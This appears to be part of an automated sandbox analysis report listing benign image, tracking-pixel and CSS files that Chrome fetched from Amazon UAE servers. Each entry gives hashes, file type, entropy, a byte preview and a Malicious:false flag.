                                                                                                                                                                                                                                                                MD5:10A18ACCF6673BF6050A7F1082796C71
                                                                                                                                                                                                                                                                SHA1:9904B82197D81A723AB081929FE8251E8E7CD62F
                                                                                                                                                                                                                                                                SHA-256:3C8A0ED83351A8B66F54B918032A69DFE5A6E21DC28AC563CA0B666C48B51617
                                                                                                                                                                                                                                                                SHA-512:AD3E194A626AFE3F3A7D656995D082F89682D293FD9AACA44C3A8DA651DCD4E335AF0C7B20DFECD540D4F27B535189CA119DC69DD7DAE1588B41E20B0380903F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/51t6g0536NL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........x.................................................!1..2qQ.."ABar.....3.#..$Rb......................................................?.................b..8.oh..............k....xJ..5...i......<..g}}_...v...W.k...Y.*:|......;I=.....d.\..E.(....................U...uN..i.4.....|2...^.$...y.M.n}..}.w..y......Q..%..n...{KL.sGd......@.....mr..Er.*R........1{......#a...u'Oi%..tg...;.J.i<...Zl.....W...NU.qQvgT..p.$.....cQso...........................O.....3.h'.....q......m.N.s..E.9...Z.R,.C...NU#%..-......jTNu>)~K......O..W.dz.h..\....~......w.K6.^......z.ft.]..5.D....$..-.8cJS.dP.......................W....iI.w.....N..8L.l...d*.cG.jl.i.c.Tte7...-./..I..r.:..N....9u-).m.......oy}..>.d...O.3z.IJ0YN...Yt...V..;z..9..F9K\j.@h..f.3...E....v.a.Yz.i./.OH..}SK._...v8}xRrr{.t...n..?i........N..i|
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3097
                                                                                                                                                                                                                                                                Entropy (8bit):7.796732921016361
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:/85mpc2BJWJDMOX3U3Ju8DMvvH/njc2WRiMqZTSf57Pn35fpHsub9:/86c2mp9HU3OvHjcxRaNSfRJfVJ
                                                                                                                                                                                                                                                                MD5:D6CDF967FF56E4FC4101417898604FB3
                                                                                                                                                                                                                                                                SHA1:3C5502DAB48481B09937CB2FC2911D98375B9ACD
                                                                                                                                                                                                                                                                SHA-256:AAA083549A0B0892E4E3521D3480FD10CAE51F41B7B995B7D36C78C799D97A0E
                                                                                                                                                                                                                                                                SHA-512:0C0D5CC3815D8FF7BF93B4BF2BE42C8E5E3B0A2B0FEB1D73B909189382989C7F0EE762285AB232A29362CE34A07F299FAA5E46D6F6AB4B2852BC48404E888FAF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NGI2NmQ3NTEt-w186._SY116_CB642007527_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5.......................................................................|.D..~..........#1...:.L...X.7v3E............|*.3#].........UlV.#rs...v.............zF.,w.".....lno.....Vr...l:/...N.a........~...O..zS9....:.........).J.~d...(........G...+......'..s.k._[...^..^..n.Y.5&.....>...n.Z..y...o...Ob....y{..Nt4..0..............@............................!1AQ."02aq..@RrBb.......$6CDsu............?......?%..gn....Y..l...k.>\.S/.!.......B...#..x..0=.....R.d8..Gt....A.....~..p..-...Z....O.~.8.,..P.SJ..W...iWP..g.p~I.,..#.....2.l..>>.rj."I.D..].*`.*q .E$.......>S.E..,...d..N.U.....%0R..]R.....W.A....r$..H.Y)...~...[...2.......V....9......r.W%y..U:.`..,....N.Tn...o....x.9h..70..qQ-.K].4.S..Tv8..C....X5.y......+...((+....;..G.k...H"......5...4..#.P...........m.i..w.....&..no....p.%@
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1438
                                                                                                                                                                                                                                                                Entropy (8bit):7.4301903007245205
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TRe+0CmRdRaN9HFntvWdRJgVuSUy7IrLZeRMT9zZEkCuR1C7BMOqrr:TT0rTRm9lt+xg/WLZe6IraXH
                                                                                                                                                                                                                                                                MD5:77F93C1FDBAFC67AE8AFF833FFEBF1CC
                                                                                                                                                                                                                                                                SHA1:176864A0C17A47414D7C0B7D503753229D3677EB
                                                                                                                                                                                                                                                                SHA-256:AA644C37917FCBCA55F6F942F6E6C72D065C8A25A6DA0F33D3CFA66DA76AC5AB
                                                                                                                                                                                                                                                                SHA-512:C0E7FCF6B99A1F1DDA0219309512CB10877C8325A0D121FA88690D50B84E75AF90BECAC2ADF438E3964B7474883FAB9FCD723EEEE8AA3AF57ACF8CFCCEFFD700
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213328_UAE_3151165_153x125_en_AE._SY116_CB428587699_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!..1AQa..."#Rbq..$.................................................!1."#2Aa............?............T..4j.T..A..n6.{...U....*..4\|4.MgB...;...y....L..w.gS>U.................w...X.M.iv;J...t......#..m.{~..ce.?O..o..Tf.:%.V............d..W8C.kz.(/..}..CB......j<S....%.]..g...$...D..............P8Nj.........G.P..=....&..tD.3..K.p..o}.v........&...=.k..|..a.>.c.]wOw%..p./.....y...[..k.e..}6<..w..Q..p.Q.&..e.+".....u.u9N.T...%(.kri........\..... ........R.@..W:....m.....Y..d......................I>..Oj....vM.6..e.....*.c...nyj..nSWj7J...RQ.Si.7..._d......s..|M..}...'..+...\.s...?..t..8.s....m....z..Y.h.c.5..I...g..w...'q@.............1........W..u.......bQ.x.#.!/X....._F.Y...F.~.k|...I .....|...X,..<..._..TR.#.#..<.f.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D389%26pc%3D1093%26at%3D1093%26t%3D1723469065029%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:1094
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1231)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2564
                                                                                                                                                                                                                                                                Entropy (8bit):5.09985561571782
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:/O3OpHOp8OrOhO18lupnGpwpCpvpSpiULvApSprpEZ9J9k9i9k9K9Ef9k9K9pGK+:S8Mt9Y
                                                                                                                                                                                                                                                                MD5:5462AAAA4A0C57A4F6EF891AE4251B47
                                                                                                                                                                                                                                                                SHA1:94BE8E39623702BA8F7E2CD194087F8D5B02FBA3
                                                                                                                                                                                                                                                                SHA-256:5EF8905853D99C87B170592136B8F03D77169D78A2AAE47E9F5459175F5ED5CF
                                                                                                                                                                                                                                                                SHA-512:A1092DD6422D90C07DB3F74EAB32F65249AF35FC27A7BE444E4F41D77928840DBAAA30F298E6C38B2D440F36CE0DEC3B1EAF2777D15B9D674A91DA1AC87F990C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/11Hy-4jiUaL.css?xcp
                                                                                                                                                                                                                                                                Preview:._cropped-image-link_style_cropped-image-link__3winf{height:600px}@media (max-width:767px){._cropped-image-link_style_cropped-image-link__3winf._cropped-image-link_style_tablet-app__1Ez8O{height:368px}}@media (min-width:768px) and (max-width:919px){._cropped-image-link_style_cropped-image-link__3winf._cropped-image-link_style_tablet-app__1Ez8O{height:470px}}[data-grid-size="3"] ._cropped-image-link_style_cropped-image-link__3winf,[data-grid-size="4"] ._cropped-image-link_style_cropped-image-link__3winf{height:615.6px}[data-grid-size="5"] ._cropped-image-link_style_cropped-image-link__3winf{height:748px}.._cropped-image-link_style_centerImage__1rzYI{height:100%;width:100%}.._cropped-image-link_image_round-corners__22iOW{border-radius:4px}._cropped-image-link_image_asin-container-white-box__3Stwp:before,._cropped-image-link_image_asin-container__LRY5p:before{content:"";display:block;height:0;padding-bottom:100%}._cropped-image-link_image_asin-container__LRY5p{-webkit-box-flex:1;-ms-flex:
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):14031
                                                                                                                                                                                                                                                                Entropy (8bit):7.931971681931018
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:TlLbK+kAeUpQ+/qwzKv8NtWnyJBtVCtDCrya:GKP/qwzzNtW0VCtDfa
                                                                                                                                                                                                                                                                MD5:97BD687413BC6A2995DE210A5872826F
                                                                                                                                                                                                                                                                SHA1:643A5E062B3846FA0282B85D9554209EAD181B04
                                                                                                                                                                                                                                                                SHA-256:DF7E75B795BCC16AC2BE53D95A951E42E67C1C82DB614F5083E381C338D64D9C
                                                                                                                                                                                                                                                                SHA-512:05A05C6B075AA96A94EB9E99E90B86F6D5AA39FF1D36AF3CEAE49F796ECD7603F0649A6094A3E8F48171AAEAEF7A8050FD9A09AE25CD38E14195EAC45E7031EE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........(.."..........2...............................................................X...............#]^.l..'.wjS..4..........S.y.J..7....[5...0.P....5w.+...1.Gb..n.+.|qA...|..G....e.5.`.X...wI...zL.,.@........k.^Y.W....1...$}.p.T.<...e.....wz;..c...d..x-_.v...@...:....~R..fT....f;+.s...>..A..3Tby.gR...F..f]{.R.dh.R...2...........B.\s...{^...W....F.I..{.u^....\\.W..7.. Q..F.z.ng.L.+...;...V.7H1.L.B.nN...1......C.f..c..N8.t..*.[..^+H\.}o.q&...w.(...<Q.\.....Q]...K.*#.].x.\m..X.mh.f.s.K...I|y....7%.k..9..rE.tc......X.]...e.....#.g..\.z.S......'....w;..8.!.H.T.V...y.."....K....,Q.e.I.[<_.\r,..b.......G".l.W?;........5...KO..O...,A'.".K...v,..7..2.....Rx.Z.w...;1...u.SQ......+.{L..-xZ.4.du.-.<B..~e...............i.............z......n...'...p.*.7!.#..c..2...........CMt..e..`.b.........3
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 400 x 750, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):27972
                                                                                                                                                                                                                                                                Entropy (8bit):7.9746563718982335
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:PYh3ZcLbZnL3Azzh2/99/KL6sFxvjCENS:A8397Afhgjq6yv9NS
                                                                                                                                                                                                                                                                MD5:1B5A1FB097715B1604B21ABA92EF6A3E
                                                                                                                                                                                                                                                                SHA1:C4A765AEDD886DC04D89E7E93B6A02C59ECB7013
                                                                                                                                                                                                                                                                SHA-256:437E95A363A4291060E34BA170E043274E0155821E9BE374F35DE3C4F13CBAA5
                                                                                                                                                                                                                                                                SHA-512:0DD02CB398A22092732CFAE2B141F5327360A42E931AFD27AAF8EAE402C8C36EF0BB5EDEA82EB39E66567DAED1CAA79B70CA4BF41D30387653563D0A78AB9B0E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.....................PLTE...*AC.38.'0")0!*"NT[......333............dim/8@/8A`goWVS. !...QV\...bejeee>AC......[bj}..PW`YtS............mwxjpv...MSY`fi;=@KR[......_di......djr....................................V]e...u....8,3..!..2..:...u..v....=?A,..j.......8...m.02.u..@).ojBGL0....."....8>D.n...2..9;=.>/..B..[........@@A.v......D4.)."..J.B? ..H..432...\.[..:H..#)-....* ...............................B.......................#......G.......P..J..:.................B..9..int.s..d.5g....I..9..I..jqwqz}.]I.. ..D.....E..$.......T....]...=..............cgk.....L...t.vm.OM.+......+.g...#........'..Q.ZY.%.f@.y................................P.1..<...N./..>......................s.i...P.........}...y...........;..;.F5.G6........%.............(Z"....tRNS............*......<.......{...%Zk.I....F~.....................*..Z<.......]...t..}.`'......h.....;....{..K..........L......^..e....B.*b.|..............d.....O....................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3213
                                                                                                                                                                                                                                                                Entropy (8bit):7.826121299215918
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6L/eMVDhQzdOGIN0pBjCjx8rD2Hj6wxbvu1XtF5JBEtdfGhkXkOK0RS0Hegl:TnVGzkGpwarD2DnoF5Qtdqk0ObSY+C
                                                                                                                                                                                                                                                                MD5:6E1FE50260044DDA45FEE37E8DC2E21C
                                                                                                                                                                                                                                                                SHA1:0EB224AEC383AD8B41A27BAB2E6E4EF54C0915D5
                                                                                                                                                                                                                                                                SHA-256:898FE1F51A660B62567A8B6C9F42AA3E5FBDB7F63A6F8A47499F71AA792ED0A4
                                                                                                                                                                                                                                                                SHA-512:EB88C525559E865BDF7FF1631C597249E16699F5482F9199DBA51AA842849C6A52FB5F4432F05DFBA9D12F0E0D2F529647192E79DBA2D5223D2B0386CE2D9AD9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/ohl/xmsridha/toys_bau_qc_2322/xcm_banners_dqc-summer-outdoor-play_372x232_ae-en._SY116_CB622964834_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!.1A..Qa.2Rq.."Br....#Cb.........$DT..................................................!.1A."q.2.BQa.................?...D..." ...""....*(%..T....Td.......n.j.6.}.......h.R..U.Q@.D..e.[6.uwQ......8]...thh.S.Kz.<Ej..T.Mg.6.\.\.*8........$.j..l.X....u.V..a.i./B.u..V..r.8.t' ..}?R...c(BV>.-.r..5.[W..!F.Xc>c..c"a.*JKx.<i....<...DD....D@...DD.;..gnu...*!..f.Jy..NF.=I.`.4j...;J'.9/S...slu=.z..3/:7V.5...L..H.^..1..U.Z.q#.......P\.=...Z..j.M....?...\,........o..<.c..+Y..7L..*..-.8....2.M.v... .*c....!UJU......g..V.ri'v|.S.9.....kM.SJ|Ny*...@3'._f......n...'.._.c..&aN.e......\.W"..&.]....pO"90....>....E.9...B..v.>....5.,.R..v..|r..:..aE..E.is.....tb...4>..j.[p...}....p........f.5.z......|..M.6..S.uL..........I.......P.I........
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 152x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5405
                                                                                                                                                                                                                                                                Entropy (8bit):7.931655912992776
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TT0NzPX0XFb2LJBSzpdf6ETeqFf9Zql+/XTPvw3BSPg9HO5NEg67I/+Y3SApa/x/:H0BX4FQkV6cFlr/XTPvwRSPgI5a/s3Sj
                                                                                                                                                                                                                                                                MD5:3695D8C7F62BD7702D6A3AFE3C6188B9
                                                                                                                                                                                                                                                                SHA1:32E82299E3E799EDE7A63E95998AA362A47E3378
                                                                                                                                                                                                                                                                SHA-256:35237453728A8D14FD747803C5BD1C9AE987F9EF79FCF53916F51495A0AAE516
                                                                                                                                                                                                                                                                SHA-512:E005F8FDB6A467F920EDCC06664429AE00CF9AC603561F6DAD48BBFFD6E0E37A6AA195E90F0A5A7E271650948FB016A9D0D217AF6433F39F65F8EAA947773CFA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..................................................................!1AQ"Ra.....#Sbdqr.......4....$%3Bs..2.&5CDEUce...................................................!.1aq..."#$23AQR.b......r...............?..].Q@..Q@..Q@.j<._.a.]M.............W..Z..Qsfn.I..........o8.^3......en..C.&....v$.....2.E...\....<..]'Q..i1..:..V ..8.].TA.k....{1_.o.../3O...;.g...c..*2I......w2&.g|...._J8.X.... ..)d....".].S..C$.h....(...(...(...(...(...(......g..!...LU...?.M..I.a..~DU(.1g.*...`:{.rk_.V.u...........|.......S.r.d5.B|6..._.i...!..a..=.E.UI.(...(...(....0^.qY.g..p.H.B....A.B........_.... ..I....<GK{..33...r0>z.........|..Z..p.......JX{.9......J.'x...7p....t.Q.u...`..~.d...4).....r-.....9.....4......d#......~....j/aj.yH.;R....3.4k!..".!..s...%p.....-.y.uj.\..Gu.z..kr..6f.hM*.D..+0...wK-t..V.({{k.>4z]..<P ..,.v'..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6512
                                                                                                                                                                                                                                                                Entropy (8bit):7.696599475688485
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:BEciLXKDnb3gN2/1c0KagkbaXrVKrZrOF:BLiuHgN6ebRkaXgrZrm
                                                                                                                                                                                                                                                                MD5:CBDE204C106EBA027E6F5FA1324DCAC2
                                                                                                                                                                                                                                                                SHA1:7EB11AA91879BE6D64D858043688F676863CD5ED
                                                                                                                                                                                                                                                                SHA-256:2719F6BCCD06E6AB555D05AB94311470643FC0214E285BBFA504FD2B98F43E68
                                                                                                                                                                                                                                                                SHA-512:364476E42A77E8F2EBB4EFBCCF5C1A56D028B8CFB66E73B01CC2ABE751421A5EEF7F9876EC3444305328F597901CD762DA703D46E510EECB5FA88AA025D18476
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/21nsiubzhVL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1.....................................................................J0.. .k...M...kT.iA....|..6....U..o1e...............(........FJ..DUh(.....,.c&2...M.gCZ=..............9.~5.9.e&.{E..g.jVx.y.....>..~...?.'z.z...Z.cSd.c.n.C4...............Y...k.....M..... .v.1/.....==...)Cc.,f.`.y..n..g=._.{................q,.n.n.=}.r..DL..........4<..n...z..jTUS...H&/.|..............48}...gwGx...V.....0G#&.N....S...Jc...&:.mS...H...<'.............48}...c...S_>..."`.oC........*j{..E)zc.:^.)....\$.e.~..............<.K.u;....Mm.b"`..*@..9..).Z.U.....\y1..e.+j....{<P...........O.._3........."&....0DL.....J.....+.&3.......{...q@...........x..a..;].w@kl...Q..bab&..0R..W.Lf:.q.a..[.....o.............+.=.....y.!...+aJ.....L%kj...U..*.kj.q..[.l.C..._............<O..:...3.[WkTV."......J..)..V..R..X.1c......~c..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3550
                                                                                                                                                                                                                                                                Entropy (8bit):7.327716549611057
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Tge5fx/fypCEkzOoZZdONU1b12r10rzkhA:Dx/fypCEkzOoZmO1b1G01
                                                                                                                                                                                                                                                                MD5:3C188AFF5CD447DB7C131231621BAB0E
                                                                                                                                                                                                                                                                SHA1:77382796B9066AD50F3E3CBDAD71888987514348
                                                                                                                                                                                                                                                                SHA-256:C2D8DA36D1C38622B29B9CA8B2867F4A4E3FC457CC5E136FBFE5233FFAD4391A
                                                                                                                                                                                                                                                                SHA-512:C0E62245E840E092535E7472534354A6608A3455EDEC13C3E43020DE541BC26CEBE5D2AD3627679EE1235005FB86D0E0368AD3B7219B48B12CC607A1A8947C04
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71mL0rwKWNL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........0.......................................................................~L).<....~`$.../L.v..................y..-..E..........-....d..;.........................7.6]Yd......Y.....g............................q.;.....xNK.c..}7..z..................a.<.ob.~.."..bN:...\........................m9.d..O.f1.e9....JV.. ................&M.6.3...".,...|^....@................t..,.6..f9.UYF*Si..n'.....................e.fL..V.{....I1R.A~;n'..@....................g...+BMy.IU..w.7....!.................:]Ivd...h. .&.......v.Om.. ................'K.....V...H.kI0n.n.>.......................ud..|..*..,..L;.{r...~.=..................>Mi6d..^...F.ZI.kWg7.o.....................'.".....&..4..........=..................>=.V......j4..c.......= .................?..y.+...4dV.Q.T..3.mK.....................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2070
                                                                                                                                                                                                                                                                Entropy (8bit):7.505726286026499
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rfGvl6wUgY7J4NlXPFWECtllV/7m0hFZcQXZpS:TGGvl/Y7JWlfFDgLV/77hjHbS
                                                                                                                                                                                                                                                                MD5:E9D967B5E9E72403AA700242B6EED0D7
                                                                                                                                                                                                                                                                SHA1:6C8CFFBC74874AEE67B9778F27C02BB0C7E5E429
                                                                                                                                                                                                                                                                SHA-256:B73864120BD7B4FD8E933ED1B8BA1A08B861E3F522EFDD8467FD8DBAD126A8A1
                                                                                                                                                                                                                                                                SHA-512:9660B28027DAA95874CF33097925905921E43208F3E4D60CCBC698E307653F77B4796FB5FAFBDD8859E2B1F1A20C90EAB598860CFB5A6979F1CA80D3EF7083D8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61gAO+Q1y5L._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........y.................................................!..1Q."Aaq...2.....BR....3S.......................................................?..............%%..y$`.v.{.i.....qJ:GW.c...8\.%.....a"./.pvq.A.o..cq......7.F.M....k8.x......qH.E8.h..i...~M?.$...4...b..!d...0.E....}Q}<..................fm.....k../...Wh.L.p.#..c...;t.....f]X.g.....g.....~.H.....g.H..[.<.%...w...l.. ...d4.4K&AJl.)..<.0...;.4.N.Q..oI=;.....Vb..~.....C.6.....KIx...b.............3q....xk.)T..;.......Cn.M.C...^v..Z.G....FM.+g).f...8...F.."..3..<...&....`...6.#C.bp.m%.~...Fp|.._...{!/....?R..^K.../z.....uu?~.Dnl}..{..+..Tg..KDYw..4..)U(.....'...>.y.n..L.v.3+....&....r..h.M..u`.5?...u~.#.....'.0....~....@.@........8.{.l........{....P8K$..y.Q....K..u.O...r..`.......\....Fh.>..y...X:/..6.....8..s.O...t...mx..(.\[]
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2504
                                                                                                                                                                                                                                                                Entropy (8bit):7.683203594367942
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:q0fVRckJT428RUXeB6hSTJpau2y2xFNaxGIkamZRUsKenYpP94jbyqg2:JNRcM1zhETjVsFkuamZRUsOP9Dqz
                                                                                                                                                                                                                                                                MD5:F90AA3D3F370FAF9FA196089CD86EEF9
                                                                                                                                                                                                                                                                SHA1:4B1D37029773AC6C057C774954EB0C83B647FE23
                                                                                                                                                                                                                                                                SHA-256:E59FC503FD4CC663A537D942E7FE4CC5D05BD505C22BEFA575A9B9263C08F30B
                                                                                                                                                                                                                                                                SHA-512:4896EC010B3F83A5D41FE00A3D7139C3ED868E7C9893326B01C6270557B153244E4362D32C084451B807F0F312D131C4B1D197195CAB996BC15C9578248C52B3
                                                                                                                                                                                                                                                                Malicious:false
